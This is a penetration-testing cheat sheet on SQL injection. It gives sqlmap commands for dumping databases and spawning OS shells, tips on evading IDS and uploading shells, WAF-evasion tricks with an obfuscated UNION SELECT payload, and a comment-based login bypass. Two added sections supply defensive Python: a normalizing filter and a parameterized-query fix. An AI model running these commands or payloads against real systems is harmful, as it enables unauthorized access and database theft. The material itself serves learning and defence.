- SQL Injection Vulnerabilities - Bug Bounty Hunting Essentials, pg 29
- SQLMap - SQL injection tool that can also spawn a Meterpreter or VNC session back to the attacker. It can return a decent number of false positives, so always verify findings manually. If you do not specify a value, SQLMap will attempt all options by default.
Guides and Resources
- SQLMate - Companion tool for SQLMap
- Maps out and locates admin panel
- Query dorking for finding targets
- Hash lookup
- RTFM: SQLMap - pg. 71
- Operator Handbook: SQLMap - pg. 284
Specify the database type if not SQL
If you need to test an authenticated SQL injection, log into the website via a browser and grab the session cookie (pull it from Burp Suite)
# sqlmap --wizard
Test whether the SQL injection is valid (returns the DBMS banner on success)
# sqlmap -u "http://domain.com?user=test&pass=test" -b
Retrieve the current database user
# sqlmap -u "http://domain.com?user=test&pass=test" --current-user
Crawl the target site one level deep from the starting URL
# sqlmap -u http://10.10.10.10 --crawl=1
Dump the database contents, telling sqlmap the back end is MySQL
# sqlmap -u http://10.10.10.10 --dbms=mysql --dump
Spawn interactive shell
# sqlmap -u "http://domain.com?user=test&pass=test" --os-shell
WAF bypass and shell setup
# sqlmap -u http://10.11.0.22/debug.php?id=1 -p "id" --dbms=mysql --os-shell
- PowerUpSQL - A PowerShell Toolkit for Attacking SQL Server
- SQLninja
- Great for evading IDS and uploading shells
- Often an IDS will recognize either SQLmap or SQLninja, but not both
- With SQLninja you must specify the vulnerable variable to inject.
- Takes more to set up, with manipulation of the config file.
- DSSS - Damn Small SQLi Scanner is a fully functional SQL injection vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code.
- Many applications use web application firewalls (WAFs) to help protect against SQL injection. The problem is that a WAF only looks for certain words, characters, or patterns, so certain special characters used in combination can evade its filtering.
- For example, a very basic WAF may filter out specific SQL keywords such as WHERE to prevent them from being used in SQL injection attacks.
- Capitalization - If the WAF's filter, like the one described above, is implemented poorly, there may be ways to evade it by using variations of the filtered word. The most straightforward example is bypassing the filter by capitalizing some letters of the keyword.
- URL Encoding - Where the query forms part of a URL, URL encoding may be a viable option for evading the filter. For example, %55 is 'U' and %53 is 'S'. The WAF may not identify these encoded characters and may pass them to the server, which decodes and processes them as the intended keywords.
- Multi-line Comments - Using multi-line comments, such as /* */, may cause the WAF filter to miss the keywords. MySQL reads the content between the comment delimiters and executes it as SQL, whereas the filter may not flag it.
- /*!%55NiOn*/ /*!%53eLEct*//**//*!12345UNION SELECT*//**//**//*!50000UNION SELECT*//**//**/UNION/**//*!50000SELECT*//**/
- The ‘+’ can be used to build an injection query without the use of quotes.
- Inline Comments - To bypass certain filters, you can abuse the inline comment system within MySQL using #.
- Reverse Function - To bypass a filter looking for certain strings, you can use the REVERSE function which will evaluate the correct way around at run time. However, when going through the filter, it will be seen as ‘noinu’ instead of ‘union’.
- String Splitting - You can split strings within the query to bypass various filters. MySQL will still execute them as keywords.
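Every evasion in the list above targets the same weakness: a filter that matches literal keywords on the raw parameter value. The following is an added example, not code from the original notes: a normalizing check that URL-decodes the value, keeps the body of MySQL /*!...*/ comments and discards ordinary ones, then matches case-insensitively. It is run against the payload quoted above plus two constructed inputs; the keyword list and function names are assumptions for this demonstration.

```python
import re
from urllib.parse import unquote_plus

# Literal, case-sensitive keywords, the kind of check the notes describe as weak.
NAIVE_KEYWORDS = ("UNION SELECT", "WHERE")
# MySQL executes the body of /*!...*/ and /*!50000...*/ comments, so keep it.
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)
# Ordinary /*...*/ comments are just whitespace to the parser, so drop them.
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bUNION\s+SELECT\b")

# Inputs: the payload quoted in the notes, plus two constructed values.
PAGE_PAYLOAD = ("/*!%55NiOn*/ /*!%53eLEct*//**//*!12345UNION SELECT*//**//**/"
                "/*!50000UNION SELECT*//**//**/UNION/**//*!50000SELECT*//**/")
ENCODED_ONLY = "/*!%55NiOn*/ /*!%53eLEct*/ 1,2"          # constructed
BENIGN = "q=Union+Station&sort=select"                     # constructed

def naive_filter_blocks(raw):
    """Weak check: literal keyword match on the raw parameter value."""
    return any(k in raw for k in NAIVE_KEYWORDS)

def normalize(raw, max_rounds=3):
    """Rewrite the value into the form the MySQL parser will actually see."""
    s = raw
    for _ in range(max_rounds):            # undo URL encoding; '+' becomes a space
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = VERSIONED_COMMENT.sub(r" \1 ", s)  # /*!%55NiOn*/ -> UNiOn
    s = PLAIN_COMMENT.sub(" ", s)          # /**/ -> single space
    s = re.sub(r"\s+", " ", s).strip()     # collapse whitespace runs
    return s.upper()                       # defeat MiXeD-case keywords

def normalizing_filter_blocks(raw):
    """Stronger check: match keywords only after normalization."""
    return UNION_SELECT.search(normalize(raw)) is not None

def compare(raw):
    """Return (naive verdict, normalizing verdict) for one parameter value."""
    return naive_filter_blocks(raw), normalizing_filter_blocks(raw)

if __name__ == "__main__":
    for label, value in (("page", PAGE_PAYLOAD), ("encoded", ENCODED_ONLY),
                         ("benign", BENIGN)):
        print(label, compare(value), "->", normalize(value))
```

The constructed encoded value slips past the literal check but not the normalized one, while the benign query string is accepted by both.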
An input field may restrict the usage of certain datatypes and/or words/punctuation. This can make the exploitation of SQL injection vulnerabilities a little bit more difficult. However, two functions can be used in conjunction to bypass filters such as these:
- Within MySQL, you have to use quotation marks to input a string into a statement. However, with the use of string functions and encoding methods, you can get past this hurdle.
- To concatenate strings inside a statement, use the MySQL function CONCAT(str1, str2, str3), for example:
SELECT CONCAT(login, email) FROM users
- Another way to create strings without quotes is MySQL's CHAR function, which returns the character corresponding to the integer passed to it. CHAR and CONCAT are often used together to build complete strings that bypass specific string filters, so no quotation marks are needed in the query.
- This will select data from a database that is of ‘MLK’.
- Encoding methods are another way to manipulate strings. Strings can be encoded into their Hex values either by passing a hex value or using the
- For example, the string 'password' can be passed to an SQL statement like this:
- When an application checks login credentials, it submits them in a query, usually with a username field and a password field. If the query returns the user's details, the login is successful.
- One way of bypassing the password check is to comment out the part of the query after the username:
- Original login query:
SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'
- Query with bypassed password field:
SELECT * FROM users WHERE username = 'administrator'--' AND password = ''
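The bypass above works only because the username is pasted into the SQL text. As an added example, not part of the original notes, here is that vulnerable pattern next to its parameterized fix, run against a constructed in-memory SQLite table holding the two users from the queries above (SQLite accepts the same -- comment syntax); the function names and the admin password placeholder are assumptions.

```python
import sqlite3

def build_db():
    """Constructed in-memory users table holding the two accounts from the notes.
    Passwords are stored in clear only to mirror the query in the notes; real
    applications compare against a password hash instead."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("wiener", "bluecheese"),
                      ("administrator", "PLACEHOLDER-admin-password")])
    return conn

def login_concat(conn, username, password):
    """Vulnerable: user input is spliced into the SQL text, so a username of
    administrator'-- turns the rest of the WHERE clause into a comment."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def login_param(conn, username, password):
    """Hardened: the SQL text is fixed and the values travel as bound
    parameters, so the quote and -- in the input are just characters."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = build_db()
    print(login_concat(db, "wiener", "bluecheese"))   # wiener
    print(login_concat(db, "administrator'--", ""))   # administrator
    print(login_param(db, "administrator'--", ""))    # None
```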